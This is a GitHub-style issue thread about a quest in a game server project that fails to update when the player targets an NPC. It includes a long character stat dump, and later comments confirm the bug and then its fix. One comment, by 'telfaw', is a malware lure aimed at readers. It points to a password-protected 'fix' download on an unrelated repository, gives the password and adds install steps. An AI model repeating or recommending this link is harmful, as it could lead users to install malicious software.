### ISSUE TITLE
Enel Garden Key Mission - Unredeemed targeting

### ISSUE THREAD

**Issue by Kresnika99** [project-rubika/issues#811]
**Describe the bug**
Mission doesn't update when you target Fortuitous Jorr-Share

**To Reproduce**
1. Start the Enel Garden quest
2. When reaching the part where you have to speak to Forrester Enel Aban in Enel Garden, after going through the dialogue, he will hand you an 'Ancient Tracking Device' to go target specific Unredeemed mobs.
3. Exit to Remnans and head to the unredeemed temple where it's marked on the map
4. Target 'Fortuitous Jorr-Share'

**Expected behavior**
After targeting Fortuitous Jorr-Share, the mission should update to target Hypnagogic Wox-Xum Shere next.

**Screenshots**
----

**Character info:**

Kellymp [220 Metaphysicist]
------------------------------------
    absorbchemicalac 	0
    absorbcoldac 	0
    absorbenergyac 	0
    absorbfireac 	0
    absorbmeleeac 	0
    absorbnanoac 	0
    absorbpoisonac 	0
    absorbprojectileac 	0
    absorbradiationac 	0
    accountflags 	0
    adventuring 	199
    age 	0
    aggdef 	100
    agility 	781
    aimedshot 	200
    alienlevel 	0
    aliennextxp 	1500
    alienxp 	0
    alignment 	0
    apartmentsallowed 	1
    apartmentsowned 	0
    assaultrifle 	199
    attackspeed 	5
    attitude 	0
    autoattackflags 	5
    battlestationrep 	10
    battlestationside 	0
    beltslots 	5
    biologicalmetamorphose 	1295
    bodydevelopment 	1135
    bow 	199
    bowspecialattack 	199
    brawl 	198
    breakingentry 	200
    breed 	2
    burst 	199
    cash 	9614083
    changesidecount 	0
    charstate 	0
    chemicalac 	750
    chemistry 	200
    clan 	0
    clanconserver 	0
    clandevoted 	0
    clangaia 	0
    clanredeemed 	0
    clansentinels 	0
    clanvanguards 	0
    closecombatinitiative 	200
    coldac 	730
    colddamagemodifier 	1
    computerliteracy 	1295
    concealment 	200
    currentmass 	0
    currentmovementmode 	3
    currentnano 	6166
    currentncu 	0
    currentplayfield 	4544
    currentstate 	0
    deadtimer 	0
    dimach 	200
    disarmtrap 	200
    distanceweaponinitiative 	200
    dmsmodifier 	0
    dodge 	236
    driveair 	200
    driveground 	200
    drivewater 	200
    duck 	237
    electricalengineering 	200
    energyac 	550
    energydamagemodifier 	1
    EquippedRHWeapon 	66
    equippedweapontype 	66
    evade 	236
    exitstatel 	0
    expansion 	3
    expansionplayfield 	1
    externaldoorinstance 	0
    externalplayfieldinstance 	0
    fastattack 	200
    fatness 	0
    features 	6
    fieldquantumphysics 	200
    fireac 	729
    firedamagemodifier 	1
    firstaid 	200
    flags 	528961
    flingshot 	200
    fullauto 	198
    globalresearchgoal 	0
    globalresearchlevel 	0
    gmlevel 	127
    gos 	0
    grenade 	200
    headmesh 	40629
    healinterval 	3
    health 	4760
    icon 	0
    inplay 	0
    insurancepercentage 	0
    insurancetime 	0
    intelligence 	781
    invaderskilled 	0
    isfightingme 	1
    itemtype 	0
    killedbyinvaders 	0
    lastconcreteplayfieldinstance 	0
    lastmailchecktime 	1283065897
    lastperkresettime 	0
    lastsaved 	220
    lastsavexp 	1449450
    lastxp 	2555840
    level 	220
    life 	4760
    lr_energyweapon 	200
    lr_multipleweapon 	200
    mapareapart1 	0
    mapareapart2 	0
    mapareapart3 	0
    mapareapart4 	0
    mapflags 	0
    mapnavigation 	200
    mapoptions 	0
    martialarts 	199
    materialcreation 	1295
    materiallocation 	1295
    materialmetamorphose 	1295
    maxnanoenergy 	6166
    maxncu 	158
    mechanicalengineering 	200
    meleeac 	578
    meleeenergyweapon 	200
    meleemultiple 	199
    members 	999
    mesh 	17530
    metatype 	0
    missionbits1 	33554432
    missionbits10 	0
    missionbits11 	0
    missionbits12 	0
    missionbits2 	0
    missionbits3 	0
    missionbits4 	0
    missionbits5 	14
    missionbits6 	0
    missionbits7 	128
    missionbits8 	0
    missionbits9 	0
    monsterdata 	0
    monsterscale 	100
    monthspaid 	0
    nanoac 	236
    nanoenergypool 	1295
    nanofocuslevel 	0
    nanointerval 	2
    nanoprogramming 	200
    nanoprowessinitiative 	1295
    nextxp 	3067008
    npcostmodifier 	0
    onehandbluntweapons 	199
    onehandedgedweapon 	199
    otarmedforces 	0
    otfollowers 	0
    otmed 	1234567890
    otoperator 	0
    ottrans 	0
    otunredeemed 	0
    PaidPoints 	0
    parry 	199
    perception 	200
    personalresearchgoal 	0
    personalresearchlevel 	0
    pharmaceuticals 	200
    physicalprowessinitiative 	200
    piercing 	199
    pistol 	200
    playerid 	1234567890
    playeroptions 	0
    playfieldtype 	0
    poisonac 	746
    previoushealth 	50
    prevmovementmode 	3
    profession 	12
    projectileac 	576
    psychic 	780
    psychologicalmodification 	1135
    psychology 	200
    PVPDuelDeaths 	0
    PVPDuelKills 	0
    PVPDuelScore 	0
    PVPProfessionDuelDeaths 	0
    PVPProfessionDuelKills 	0
    PVPRankedSoloDeaths 	0
    PVPRankedSoloKills 	0
    PVPRankedTeamDeaths 	0
    PVPRankedTeamKills 	0
    PVPSoloScore 	0
    PVPTeamScore 	0
    race 	1
    radiationac 	732
    reflectchemicalac 	0
    reflectenergyac 	0
    reflectmeleeac 	0
    reflectpoisonac 	0
    reflectradiationac 	0
    reflectreturnedchemicalac 	0
    reflectreturnedenergyac 	0
    reflectreturnedmeleeac 	0
    reflectreturnedpoisonac 	0
    reflectreturnedradiationac 	0
    rifle 	200
    riposte 	200
    rp 	0
    runspeed 	1154
    savedxp 	2555840
    secondaryitemtemplate 	214788
    selectedtarget 	2071
    selectedtargettype 	0
    sense 	780
    senseimprovement 	1134
    sessiontime 	0
    sex 	2
    shadowbreed 	0
    shadowbreedtemplate 	0
    shieldchemicalac 	0
    shieldenergyac 	0
    shieldmeleeac 	0
    shieldnanoac 	1
    shieldpoisonac 	0
    shieldradiationac 	0
    shotgun 	199
    side 	1
    sk 	0
    sneakattack 	200
    socialstatus 	0
    specialcondition 	1
    specialization 	0
    stamina 	780
    state 	0
    strength 	773
    submachinegun 	199
    summonedfrom_pf 	4310
    summonedfrom_x 	747
    summonedfrom_y 	31
    summonedfrom_z 	1904
    swim 	199
    team 	0
    teamside 	0
    temporaryskillreduction 	0
    tempsaveplayfield 	0
    tempsaveteamid 	0
    tempsavex 	0
    tempsavey 	0
    throwingknife 	199
    throwngrapplingweapons 	199
    titlelevel 	7
    treatment 	1135
    tutoring 	200
    twohandbluntweapons 	199
    twohandedgedweapons 	198
    unarmedtemplateinstance 	0
    unreadmailcount 	0
    unsavedxp 	0
    veteranpoints 	0
    visualbreed 	2
    VisualFlags 	31
    visualprofession 	12
    visualsex 	2
    vp 	0
    waitstate 	1
    weaponsmithing 	199
    xp 	2555840
    xpkillrange 	5
    xpmodifier 	0
------------------------------------

**Playfield info:**

Extended location information:
- 1598.6, 714.2, 50.4 (1598.6 714.2 y 50.4 4544)
- Pf Proxy: Model=51100:4544 GS=0 SG=0 R=4544, resource: 4544
- zone: 1042, area: "Remnans"
Server id: 105979, character id: 50000:2071, time: 2024-08-28 23:33:32 (UTC)
Version: 00.6.3_EP1, map id: NOT FOUND, build: 52606.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RaggyLP** [comment]
Forrester Enel Aban (749), quest 'Follow the Trail of Evil to...' (6F7P).

![image](https://github.com/user-attachments/assets/b55c9f60-b248-47ec-bfee-f67d07b18fb9)

Confirmed that targetting the relevant NPC doesn't update the quest.

**Comment by prkdrake** [comment]
This should be fixed by the latest update.

**Comment by Kresnika99** [comment]
Can confirm

![image](https://github.com/user-attachments/assets/7122a22e-b6ae-407e-b14a-6b29749efd7f)
